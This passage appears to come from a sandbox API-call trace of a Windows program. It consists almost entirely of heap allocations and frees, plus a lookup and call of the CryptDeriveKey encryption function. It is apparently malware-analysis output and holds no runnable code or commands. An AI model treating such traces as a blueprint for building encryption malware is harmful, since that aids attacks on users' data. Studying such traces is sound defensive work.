out: hHeap=0x970000) returned 1 [0232.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0232.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0232.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0232.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0232.071] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0232.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51448 | out: hHeap=0x970000) returned 1 [0232.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0232.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0232.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0232.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0232.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0232.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0232.072] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0232.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0232.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0232.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0232.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0232.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0232.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0232.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0232.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0232.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0232.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0232.072] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.072] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0232.072] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0232.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0232.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0232.072] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0232.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0232.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04620 [0232.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0232.073] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0232.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04620 | out: hHeap=0x970000) returned 1 [0232.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0232.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e513d0 [0232.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0232.073] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0232.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0232.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0232.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0232.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0232.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0232.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0232.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0232.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0232.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0232.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0232.073] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0232.073] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0232.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0232.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0232.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0232.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0232.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0232.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512f8 [0232.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0232.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7b0 [0232.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0232.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0232.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0232.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6e8 [0232.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0232.295] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0232.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6e8 | out: hHeap=0x970000) returned 1 [0232.295] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0232.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e512c8 [0232.295] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0232.295] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 1 [0232.296] TranslateMessage (lpMsg=0x8cef58) returned 0 [0232.296] DispatchMessageW (lpMsg=0x8cef58) returned 0x0 [0232.296] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0232.296] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0232.296] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0232.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0232.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0232.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0232.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0232.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0232.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0232.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0232.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0232.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0232.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514c0 [0232.296] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0232.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0232.296] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0232.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0232.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51538 [0232.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0232.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51328 [0232.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0232.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0232.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7b0 | out: hHeap=0x970000) returned 1 [0232.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0232.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0232.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0232.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0232.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0232.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0232.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0232.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515b0 [0232.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0232.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0232.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0232.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0232.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0232.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0232.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0232.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0232.297] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0232.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0232.297] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513b8 [0232.297] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0232.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0232.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0232.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0232.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0232.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0232.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0232.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0232.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0232.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0232.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0232.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0232.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0232.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0232.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0232.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0232.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0232.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0232.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0232.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0232.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0232.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0232.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0232.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0232.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0232.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0232.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0232.298] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0232.298] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0232.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0232.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0232.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0232.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0232.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0232.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0232.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0232.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0232.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0232.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0232.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0232.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0232.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0232.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0232.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0232.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0232.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0232.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f440 [0232.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0232.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0232.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0232.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0232.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0232.299] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0232.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0232.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0232.299] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0232.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0232.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0232.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0232.300] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0232.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e513d0 [0232.300] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e513d0, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0232.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0232.300] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDeriveKey") returned 0x75712c90 [0232.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0232.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0232.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a08 [0232.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0232.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0232.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0232.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0232.300] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0232.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0232.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0232.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0232.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0232.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0232.300] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0232.301] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa872d0, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa873d0) returned 1 [0232.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0232.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0232.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0232.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0232.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0232.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0232.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0232.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0232.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0232.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0232.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513d0 [0232.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0232.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0232.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0232.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0232.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0232.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0232.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0232.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0232.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0232.301] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0232.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0232.301] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0232.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0232.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0232.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0232.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515e0 [0232.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0232.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515e0 | out: hHeap=0x970000) returned 1 [0232.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0232.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0232.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0232.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0232.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0232.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0232.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0232.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0232.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0232.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0232.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0232.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0232.302] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0232.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0232.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0232.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0232.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0232.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0232.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0232.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0232.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0232.302] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f440 | out: hHeap=0x970000) returned 1 [0232.303] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: 